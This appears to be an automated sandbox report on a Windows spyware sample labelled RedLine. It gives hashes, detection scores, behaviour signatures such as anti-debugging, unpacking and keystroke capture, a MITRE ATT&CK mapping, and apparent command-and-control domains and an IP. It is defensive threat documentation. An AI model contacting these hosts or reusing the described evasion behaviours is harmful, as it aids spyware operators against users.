Edit tour

Windows Analysis Report
xw0K5Lahxz

Overview

General Information

Sample Name:	xw0K5Lahxz (renamed file extension from none to exe)
Analysis ID:	631872
MD5:	7915148540e7809fe683781541c1d4ed
SHA1:	cb67a77fff16b5d1db734f554806a749ac929c8a
SHA256:	310920ced8b5866693fe7947bb0e2b87618a4c5500d5c540b830c7abd470aa3f
Tags:	32exetrojan
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

One or more processes crash

PE file contains strange resources

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Checks if the current process is being debugged

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

xw0K5Lahxz.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\xw0K5Lahxz.exe" MD5: 7915148540E7809FE683781541C1D4ED)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 452 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 468 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 548 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 628 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 568 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: xw0K5Lahxz.exe	Virustotal: Detection: 39%			Perma Link
Source: xw0K5Lahxz.exe	ReversingLabs: Detection: 58%

Machine Learning detection for sample

Source: xw0K5Lahxz.exe

Joe Sandbox ML: detected

Source: 0.0.xw0K5Lahxz.exe.400000.0.unpack

Avira: Label: TR/Patched.Gen

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Unpacked PE file: 0.2.xw0K5Lahxz.exe.400000.0.unpack

Source: xw0K5Lahxz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: ul2f\|#C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, 00000000.00000000.270857170.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.263067091.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.247464819.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\WindowsFormsApp1\WindowsFormsApp1\obj\x64\Release\WindowsFormsApp1.pdb source: xw0K5Lahxz.exe, xw0K5Lahxz.exe, 00000000.00000000.262249860.000000000041B000.00000040.00000001.01000000.00000003.sdmp, xw0K5Lahxz.exe, 00000000.00000000.270571750.000000000041B000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\fuwej yixibumoyesi3-nodobakafa\vapuvizowetapa\pogirisumox.pdb source: xw0K5Lahxz.exe
Source:	Binary string: #C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, 00000000.00000000.270857170.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.263067091.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.247464819.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, xw0K5Lahxz.exe, 00000000.00000000.247207294.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb-- source: xw0K5Lahxz.exe, 00000000.00000000.247207294.0000000000400000.00000040.00000001.01000000.00000003.sdmp

Source: global traffic

HTTP traffic detected: GETData Raw: Data Ascii:

Source: Joe Sandbox View

IP Address: 5.101.153.227 5.101.153.227

Source: unknown

DNS traffic detected: queries for: blackhk1.beget.tech

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_00404CC0 PostQueuedCompletionStatus,EnterCriticalSection,WSARecv,WSAGetLastError,PostQueuedCompletionStatus,EnterCriticalSection,PostQueuedCompletionStatus,EnterCriticalSection,LeaveCriticalSection,

0_2_00404CC0

Source: global traffic

HTTP traffic detected: GETData Raw: Data Ascii:

Source: xw0K5Lahxz.exe, 00000000.00000000.263057879.000000000071A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: xw0K5Lahxz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: xw0K5Lahxz.exe	Binary or memory string: OriginalFilename vs xw0K5Lahxz.exe
Source: xw0K5Lahxz.exe, 00000000.00000000.262249860.000000000041B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs xw0K5Lahxz.exe
Source: xw0K5Lahxz.exe, 00000000.00000000.270571750.000000000041B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs xw0K5Lahxz.exe

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 452

Source: xw0K5Lahxz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xw0K5Lahxz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xw0K5Lahxz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: xw0K5Lahxz.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_0040B470	0_2_0040B470
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004085B0	0_2_004085B0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004057A0	0_2_004057A0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00408826	0_2_00408826
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004034F0	0_2_004034F0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00406DC0	0_2_00406DC0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_0042B420	0_2_0042B420

Source: xw0K5Lahxz.exe	Virustotal: Detection: 39%
Source: xw0K5Lahxz.exe	ReversingLabs: Detection: 58%

Source: xw0K5Lahxz.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_007226C6 CreateToolhelp32Snapshot,Module32First,

0_2_007226C6

Source: unknown	Process created: C:\Users\user\Desktop\xw0K5Lahxz.exe "C:\Users\user\Desktop\xw0K5Lahxz.exe"
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 452
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 468
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 548
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7032 -s 568

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7032
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC1D.tmp

Jump to behavior

Source: classification engine

Classification label: mal60.evad.winEXE@6/17@7/3

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: xw0K5Lahxz.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: xw0K5Lahxz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ul2f\|#C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, 00000000.00000000.270857170.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.263067091.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.247464819.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\WindowsFormsApp1\WindowsFormsApp1\obj\x64\Release\WindowsFormsApp1.pdb source: xw0K5Lahxz.exe, xw0K5Lahxz.exe, 00000000.00000000.262249860.000000000041B000.00000040.00000001.01000000.00000003.sdmp, xw0K5Lahxz.exe, 00000000.00000000.270571750.000000000041B000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\fuwej yixibumoyesi3-nodobakafa\vapuvizowetapa\pogirisumox.pdb source: xw0K5Lahxz.exe
Source:	Binary string: #C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, 00000000.00000000.270857170.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.263067091.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.247464819.0000000000721000.00000040.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000002.508653979.0000000000721000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb source: xw0K5Lahxz.exe, xw0K5Lahxz.exe, 00000000.00000000.247207294.0000000000400000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\Users\ntoskrnl\source\repos\Project6\Release\9.pdb-- source: xw0K5Lahxz.exe, 00000000.00000000.247207294.0000000000400000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Unpacked PE file: 0.2.xw0K5Lahxz.exe.400000.0.unpack

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00723C87 push ecx; ret	0_2_00723C88
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00724967 push ebp; retf	0_2_00724968
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_007231F8 push eax; ret	0_2_007231FD
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_007272DC push ebp; iretd	0_2_007272DE
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00726280 pushad ; ret	0_2_00726292
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00725F5B push ecx; retf	0_2_00725F5C

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: xw0K5Lahxz.exe, 00000000.00000002.508674535.0000000000732000.00000004.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.270980133.0000000000732000.00000004.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.247476190.0000000000732000.00000004.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.262464606.0000000000732000.00000004.00000020.00020000.00000000.sdmp, xw0K5Lahxz.exe, 00000000.00000000.256497344.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_004133F6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004133F6

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_00721FA3 push dword ptr fs:[00000030h]

0_2_00721FA3

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_0041355C SetUnhandledExceptionFilter,	0_2_0041355C
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004132D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004132D4
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004133F6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004133F6

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_00413645 cpuid

0_2_00413645

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe

Code function: 0_2_00413826 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00413826

Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00404EB0 WSAIoctl,WSASetLastError,bind,WSAGetLastError,WSAGetLastError,WSASetLastError,ioctlsocket,WSAGetLastError,WSASetLastError,connect,WSAGetLastError,EnterCriticalSection,PostQueuedCompletionStatus,LeaveCriticalSection,EnterCriticalSection,LeaveCriticalSection,PostQueuedCompletionStatus,EnterCriticalSection,LeaveCriticalSection,	0_2_00404EB0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004034F0 WSASetLastError,WSASocketW,WSAGetLastError,htonl,htonl,WSASetLastError,setsockopt,WSAGetLastError,htonl,htonl,WSASetLastError,bind,WSAGetLastError,WSASetLastError,getsockname,WSAGetLastError,htonl,WSASetLastError,WSASetLastError,listen,WSAGetLastError,WSASetLastError,WSASocketW,WSAGetLastError,htonl,htonl,htonl,WSASetLastError,WSASetLastError,connect,WSAGetLastError,WSASetLastError,accept,WSAGetLastError,WSASetLastError,setsockopt,WSAGetLastError,WSASetLastError,setsockopt,WSAGetLastError,	0_2_004034F0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004012B0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	0_2_004012B0
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_00401350 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	0_2_00401350
Source: C:\Users\user\Desktop\xw0K5Lahxz.exe	Code function: 0_2_004013F0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	0_2_004013F0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Virtualization/Sandbox Evasion	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xw0K5Lahxz.exe	39%	Virustotal		Browse
xw0K5Lahxz.exe	59%	ReversingLabs	Win32.Spyware.RedLine
xw0K5Lahxz.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.xw0K5Lahxz.exe.400000.0.unpack	100%	Avira	TR/Patched.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
gumtifire.com	0%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blackhk1.beget.tech	5.101.153.227	true	false		high
gumtifire.com	107.161.23.150	true	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

